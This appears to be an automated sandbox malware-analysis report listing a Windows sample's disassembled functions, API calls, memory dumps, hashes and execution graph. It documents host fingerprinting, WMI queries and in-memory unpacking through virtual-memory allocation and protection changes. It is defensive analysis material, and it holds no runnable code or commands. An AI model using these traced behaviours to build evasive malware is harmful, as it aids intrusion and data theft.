                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3302636555-0
                                                                                                                                                                                                                                                  • Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction ID: 33c8c612b6aa37cdb1e3dc4fb314b0664a70c035bd05ee8301a5db1013a0523a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F03C75105254BFD310AB66EC49D1BBFADEBC6B55F001429F98492150D6319C14DB71
                                                                                                                                                                                                                                                  Function 00B1425F Relevance: 6.0, APIs: 4, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00B14272
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 00B14299
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 00B142B5
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00B142BE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3302636555-0
                                                                                                                                                                                                                                                  • Opcode ID: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
                                                                                                                                                                                                                                                  • Instruction ID: 742bc067d952136328eaadafefc9a1a35c583297e2a25c67fdb44418e2aaf7f8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9F03A35504150BBD7206B66FD0EE5BBFAEEBC6B11F401028F94496160DB714854DBA1
                                                                                                                                                                                                                                                  Function 004148F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87stringtimeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00414951
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                  • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                  • Opcode ID: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
                                                                                                                                                                                                                                                  • Instruction ID: c736f10abd315c62769dbfe5a1a641e1cbd682ca060b05bc7c7f52c3ab47b370
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E2126747142945BCB18AB36981637B7A93EBC2319F05507EF4C6873D1CE398C51C799
                                                                                                                                                                                                                                                  Function 00420E1B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00420E27
                                                                                                                                                                                                                                                    • Part of subcall function 00420E92: std::exception::exception.LIBCONCRT ref: 00420E9F
                                                                                                                                                                                                                                                    • Part of subcall function 00420F5E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00420E1A,?,0042FAAC,?), ref: 00420FBE
                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00420E44
                                                                                                                                                                                                                                                    • Part of subcall function 00420D34: ___std_exception_copy.LIBVCRUNTIME ref: 00420D52
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::exception::exception$ExceptionRaise___std_exception_copystd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: mB
                                                                                                                                                                                                                                                  • API String ID: 2169675119-2452807568
                                                                                                                                                                                                                                                  • Opcode ID: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
                                                                                                                                                                                                                                                  • Instruction ID: e72b37502660f04861b35797f6b59bd50dabb48465353804d4c1080e981a2c3b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE0E67560022C778B14BAD6F845CCABBAC9A10750BC0843ABA4856142D7B9E555C7DC
                                                                                                                                                                                                                                                  Function 00412C14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,0040A4F7), ref: 00412CDF
                                                                                                                                                                                                                                                    • Part of subcall function 004125E0: ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 004125F8
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,?,?,?,?,0040A4F7), ref: 00412C79
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,0040A4F7), ref: 00412C8A
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,0040A4F7), ref: 00412CA4
                                                                                                                                                                                                                                                    • Part of subcall function 004122F4: ??3@YAXPAX@Z.MSVCRT(?,004125C6,?,?,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 0041231C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$??2@??3@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1832667548-0
                                                                                                                                                                                                                                                  • Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction ID: 9b3e77e2d5c6555fac4121ee25edb4a6bace10c9852293726eadeddcd5a41003
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD414A727042509FC315DF29DA8486FBBE6AFD9700719896EE4C9C7304EA74AC45CB91
                                                                                                                                                                                                                                                  Function 00B12E7B Relevance: 5.1, APIs: 4, Instructions: 142COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,00B0A75E,00000000,000000FF,00643A04,?,00B0AB9C,?,?,00643A38), ref: 00B12F46
                                                                                                                                                                                                                                                    • Part of subcall function 00B12847: ??2@YAPAXI@Z.MSVCRT(?,00B127FB,00B125B7,?,00B125B6,?,?,00643EC0,00B1272A,?,00B125FB,00B125B6,00000000,?,?,?), ref: 00B1285F
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,?,?,?,?,00B0A75E,00000000,000000FF,00643A04,?,00B0AB9C,?,?,00643A38), ref: 00B12EE0
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,00B0A75E,00000000,000000FF,00643A04,?,00B0AB9C,?,?,00643A38), ref: 00B12EF1
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00B0A75E,00000000,000000FF,00643A04,?,00B0AB9C), ref: 00B12F0B
                                                                                                                                                                                                                                                    • Part of subcall function 00B1255B: ??3@YAXPAX@Z.MSVCRT(?,00B1282D,?,00000010,00B125B7,?,00B125B6,?,?,00643EC0,00B1272A,?,00B125FB,00B125B6,00000000,?), ref: 00B12583
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$??2@??3@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1832667548-0
                                                                                                                                                                                                                                                  • Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction ID: 7eccba2df1037d1bbba07ea196f31aa2447bedc260ba697b1f7657d9a38bc929
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E841E672A042518FC715DF28D9948AEBBE6EFA9700F198DACF4C9C7304DA31AC55C7A1

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:11.2%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:33.4%
                                                                                                                                                                                                                                                  Total number of Nodes:443
                                                                                                                                                                                                                                                  Total number of Limit Nodes:33
                                                                                                                                                                                                                                                  execution_graph 13644 42e343 CoSetProxyBlanket 13645 43b781 13647 43b822 13645->13647 13646 43bace 13647->13646 13649 43b480 LdrInitializeThunk 13647->13649 13649->13646 13650 4351c0 13651 4351dd 13650->13651 13652 435219 13651->13652 13654 43b480 LdrInitializeThunk 13651->13654 13654->13651 13655 4210ca 13656 4210d2 13655->13656 13661 421140 13656->13661 13658 4210fc 13659 42111d 13658->13659 13660 41ef30 RtlAllocateHeap LdrInitializeThunk 13658->13660 13660->13659 13662 421150 13661->13662 13662->13662 13665 43d6c0 13662->13665 13664 42121f 13666 43d6e0 13665->13666 13667 43d80e 13666->13667 13669 43b480 LdrInitializeThunk 13666->13669 13667->13664 13669->13667 13675 42ce8d 13676 42cec0 13675->13676 13676->13676 13677 42cfae 13676->13677 13679 43b480 LdrInitializeThunk 13676->13679 13679->13677 13680 417e93 13684 417e98 13680->13684 13682 418066 13682->13682 13683 4180e6 13682->13683 13686 41c360 13682->13686 13684->13682 13684->13683 13685 43d6c0 LdrInitializeThunk 13684->13685 13685->13682 13687 41c383 13686->13687 13698 414a40 13687->13698 13699 414a60 13698->13699 13705 43d520 13699->13705 13701 414b7d 13702 43d520 LdrInitializeThunk 13701->13702 13709 439b40 13701->13709 13712 43b480 LdrInitializeThunk 13701->13712 13702->13701 13706 43d540 13705->13706 13707 43d66e 13706->13707 13713 43b480 LdrInitializeThunk 13706->13713 13707->13701 13714 43ca60 13709->13714 13711 439b4a RtlAllocateHeap 13711->13701 13712->13701 13713->13707 13715 43ca80 13714->13715 13715->13711 13715->13715 13716 43bf91 13718 43bef0 13716->13718 13717 43bff7 13718->13717 13721 43b480 LdrInitializeThunk 13718->13721 13720 43c01d 13721->13720 13722 439b90 13723 439bc0 13722->13723 13724 439c2e 13723->13724 13732 43b480 LdrInitializeThunk 13723->13732 13725 439b40 RtlAllocateHeap 13724->13725 13729 439e01 13724->13729 13727 439cb0 13725->13727 13731 439d3e 13727->13731 13733 43b480 LdrInitializeThunk 13727->13733 13734 439b60 13731->13734 13732->13724 13733->13731 13735 439b73 13734->13735 13736 439b75 13734->13736 13735->13729 13737 439b7a RtlFreeHeap 13736->13737 13737->13729 13738 40ce55 13739 40ce70 13738->13739 13742 436f90 13739->13742 13741 40ceb9 13743 436fc0 CoCreateInstance 13742->13743 13745 437181 SysAllocString 13743->13745 13746 437526 13743->13746 13750 4371fe 13745->13750 13748 437536 GetVolumeInformationW 13746->13748 13749 437558 13748->13749 13749->13741 13751 437516 SysFreeString 13750->13751 13752 437206 CoSetProxyBlanket 13750->13752 13751->13746 13753 43750c 13752->13753 13754 437226 13752->13754 13753->13751 13754->13754 13755 437263 SysAllocString 13754->13755 13756 4372f0 13755->13756 13756->13756 13757 437315 SysAllocString 13756->13757 13760 43733c 13757->13760 13758 4374fa SysFreeString SysFreeString 13758->13753 13759 4374f0 13759->13758 13760->13758 13760->13759 13761 437380 VariantInit 13760->13761 13763 4373d0 13761->13763 13762 4374df VariantClear 13762->13759 13763->13762 13764 42c6d7 13766 42c700 13764->13766 13765 42cbd4 GetPhysicallyInstalledSystemMemory 13765->13766 13766->13765 13767 42bfda 13769 42c000 13767->13769 13768 42c0cb FreeLibrary 13770 42c0dd 13768->13770 13769->13768 13771 42c0ed GetComputerNameExA 13770->13771 13772 42c140 GetComputerNameExA 13771->13772 13774 42c210 13772->13774 13775 42b65e 13776 42b679 13775->13776 13776->13776 13779 436c40 13776->13779 13780 436c4e 13779->13780 13782 436d33 13780->13782 13788 43b480 LdrInitializeThunk 13780->13788 13784 42d786 13782->13784 13785 436e1b 13782->13785 13787 43b480 LdrInitializeThunk 13782->13787 13785->13784 13789 43b480 LdrInitializeThunk 13785->13789 13787->13782 13788->13780 13789->13785 13790 40a960 13791 40a990 13790->13791 13791->13791 13792 439b60 RtlFreeHeap 13791->13792 13793 40ae26 13791->13793 13792->13793 13794 7fe35c 13809 7feb5c 13794->13809 13796 7fe3f6 13797 7fe376 13797->13796 13829 7fee2c 13797->13829 13803 7fe3bd 13849 7ff26c 13803->13849 13805 7fe3d7 13805->13796 13922 7fe9ac 13805->13922 13810 7feb6c 13809->13810 13825 7fec14 13809->13825 13811 7fe9ac GetPEB 13810->13811 13810->13825 13812 7febc2 13811->13812 13813 7fe6cc GetPEB 13812->13813 13814 7febc8 NtAllocateVirtualMemory 13813->13814 13815 7febe9 13814->13815 13814->13825 13816 7febfb 13815->13816 13817 7fec3a 13815->13817 13818 7fe9ac GetPEB 13816->13818 13819 7fe9ac GetPEB 13817->13819 13820 7fec0e 13818->13820 13821 7fec4f 13819->13821 13822 7fe6cc GetPEB 13820->13822 13823 7fe6cc GetPEB 13821->13823 13822->13825 13824 7fec55 13823->13824 13824->13825 13826 7fe9ac GetPEB 13824->13826 13825->13797 13827 7fec77 13826->13827 13828 7fe6cc GetPEB 13827->13828 13828->13825 13830 7fe3a3 13829->13830 13833 7fee4e 13829->13833 13834 7fef6c 13830->13834 13831 7fe9ac GetPEB 13831->13833 13832 7fe6cc GetPEB 13832->13833 13833->13830 13833->13831 13833->13832 13835 7fe3b0 13834->13835 13838 7fef8e 13834->13838 13839 7ff09c 13835->13839 13836 7fe9ac GetPEB 13836->13838 13837 7fe6cc GetPEB 13837->13838 13838->13835 13838->13836 13838->13837 13840 7fe9ac GetPEB 13839->13840 13841 7ff0c4 13840->13841 13842 7fe6cc GetPEB 13841->13842 13843 7ff0ca NtProtectVirtualMemory 13842->13843 13846 7ff0f9 13843->13846 13844 7ff1e8 13844->13803 13845 7fe9ac GetPEB 13845->13846 13846->13844 13846->13845 13847 7fe6cc GetPEB 13846->13847 13848 7ff1ca NtProtectVirtualMemory 13847->13848 13848->13846 13850 7fe9ac GetPEB 13849->13850 13851 7ff27e 13850->13851 13852 7fe6cc GetPEB 13851->13852 13853 7ff284 13852->13853 13854 7fe9ac GetPEB 13853->13854 13855 7ff293 13854->13855 13856 7fe6cc GetPEB 13855->13856 13857 7ff299 13856->13857 13858 7fe9ac GetPEB 13857->13858 13921 7ff62b 13857->13921 13859 7ff2c5 13858->13859 13860 7fe6cc GetPEB 13859->13860 13861 7ff2cb 13860->13861 13862 7fe9ac GetPEB 13861->13862 13863 7ff2da 13862->13863 13864 7fe6cc GetPEB 13863->13864 13865 7ff2e0 13864->13865 13866 7fe9ac GetPEB 13865->13866 13867 7ff302 13866->13867 13868 7fe6cc GetPEB 13867->13868 13869 7ff308 13868->13869 13870 7fe9ac GetPEB 13869->13870 13869->13921 13871 7ff333 13870->13871 13872 7fe6cc GetPEB 13871->13872 13873 7ff339 13872->13873 13874 7fe9ac GetPEB 13873->13874 13875 7ff352 13874->13875 13876 7fe6cc GetPEB 13875->13876 13877 7ff358 13876->13877 13878 7fe9ac GetPEB 13877->13878 13879 7ff377 13878->13879 13880 7fe6cc GetPEB 13879->13880 13881 7ff37d 13880->13881 13882 7fe9ac GetPEB 13881->13882 13883 7ff3b4 13882->13883 13884 7fe6cc GetPEB 13883->13884 13885 7ff3ba 13884->13885 13886 7fe9ac GetPEB 13885->13886 13887 7ff3d7 13886->13887 13888 7fe6cc GetPEB 13887->13888 13889 7ff3dd 13888->13889 13890 7fe9ac GetPEB 13889->13890 13891 7ff3fa 13890->13891 13892 7fe6cc GetPEB 13891->13892 13893 7ff400 13892->13893 13894 7fe9ac GetPEB 13893->13894 13895 7ff41c 13894->13895 13896 7fe6cc GetPEB 13895->13896 13897 7ff422 13896->13897 13898 7fe9ac GetPEB 13897->13898 13899 7ff431 13898->13899 13900 7fe6cc GetPEB 13899->13900 13901 7ff437 13900->13901 13902 7fe9ac GetPEB 13901->13902 13903 7ff455 13902->13903 13904 7fe6cc GetPEB 13903->13904 13905 7ff45b 13904->13905 13906 7fe9ac GetPEB 13905->13906 13907 7ff46a 13906->13907 13908 7fe6cc GetPEB 13907->13908 13909 7ff470 13908->13909 13949 7fe91c 13909->13949 13912 7fe9ac GetPEB 13913 7ff589 13912->13913 13914 7fe6cc GetPEB 13913->13914 13915 7ff58f 13914->13915 13916 7fe9ac GetPEB 13915->13916 13917 7ff59e 13916->13917 13918 7fe6cc GetPEB 13917->13918 13919 7ff5a4 GetPEB 13918->13919 13919->13921 13921->13805 13923 7feaf8 13922->13923 13954 7fe62c GetPEB 13923->13954 13925 7feb25 13926 7fe9ac GetPEB 13925->13926 13927 7fe3f0 13925->13927 13928 7feb3a 13926->13928 13930 7fe6cc 13927->13930 13929 7fe6cc GetPEB 13928->13929 13929->13927 13931 7fe6df 13930->13931 13944 7fe8a9 13930->13944 13932 7fe9ac GetPEB 13931->13932 13931->13944 13933 7fe87b 13932->13933 13934 7fe6cc GetPEB 13933->13934 13935 7fe881 13934->13935 13936 7fe8bb 13935->13936 13937 7fe897 13935->13937 13938 7fe9ac GetPEB 13936->13938 13939 7fe9ac GetPEB 13937->13939 13940 7fe8c7 13938->13940 13941 7fe8a3 13939->13941 13943 7fe6cc GetPEB 13940->13943 13942 7fe6cc GetPEB 13941->13942 13942->13944 13945 7fe8cd 13943->13945 13944->13796 13946 7fe9ac GetPEB 13945->13946 13947 7fe8dc 13946->13947 13948 7fe6cc GetPEB 13947->13948 13948->13944 13950 7fe9ac GetPEB 13949->13950 13951 7fe935 13950->13951 13952 7fe6cc GetPEB 13951->13952 13953 7fe93b 13952->13953 13953->13912 13955 7fe658 13954->13955 13955->13925 13956 43b720 GetForegroundWindow 13960 43d320 13956->13960 13958 43b72e GetForegroundWindow 13959 43b74e 13958->13959 13961 43d330 13960->13961 13961->13958 13962 40ce23 CoInitializeSecurity 13963 43d920 13964 43d940 13963->13964 13966 43d98e 13964->13966 13969 43b480 LdrInitializeThunk 13964->13969 13967 43da2e 13966->13967 13970 43b480 LdrInitializeThunk 13966->13970 13969->13966 13970->13967 13971 43bc65 13972 43bc90 13971->13972 13975 43bcde 13972->13975 13978 43b480 LdrInitializeThunk 13972->13978 13974 43bd6f 13975->13974 13979 43b480 LdrInitializeThunk 13975->13979 13977 43bde7 13978->13975 13979->13977 13980 40e2a9 13986 4097b0 13980->13986 13982 40e2b5 CoUninitialize 13983 40e2e0 13982->13983 13984 40e673 CoUninitialize 13983->13984 13985 40e690 13984->13985 13987 4097c4 13986->13987 13987->13982 13988 4087f0 13990 4087fc 13988->13990 13989 408979 ExitProcess 13990->13989 13991 408811 GetCurrentProcessId GetCurrentThreadId 13990->13991 13992 408974 13990->13992 13994 408851 GetForegroundWindow 13991->13994 13995 40884b 13991->13995 14001 43b400 13992->14001 13996 4088d8 13994->13996 13995->13994 13996->13992 14000 40cdf0 CoInitializeEx 13996->14000 14004 43ca40 14001->14004 14003 43b405 FreeLibrary 14003->13989 14005 43ca49 14004->14005 14005->14003 14006 431bb0 14007 431be5 GetSystemMetrics GetSystemMetrics 14006->14007 14008 431c28 14007->14008 14009 430879 14012 414a30 14009->14012 14011 43087e CoSetProxyBlanket 14012->14011 14013 40ebbc 14014 40ebc5 14013->14014 14043 4233a0 14014->14043 14016 40ebcb 14052 423a00 14016->14052 14018 40ebeb 14058 423d30 14018->14058 14020 40ec0b 14066 425920 14020->14066 14044 4233f0 14043->14044 14045 423797 14044->14045 14049 43d6c0 LdrInitializeThunk 14044->14049 14050 4235f1 14044->14050 14051 4234c6 14044->14051 14045->14045 14045->14051 14101 4215f0 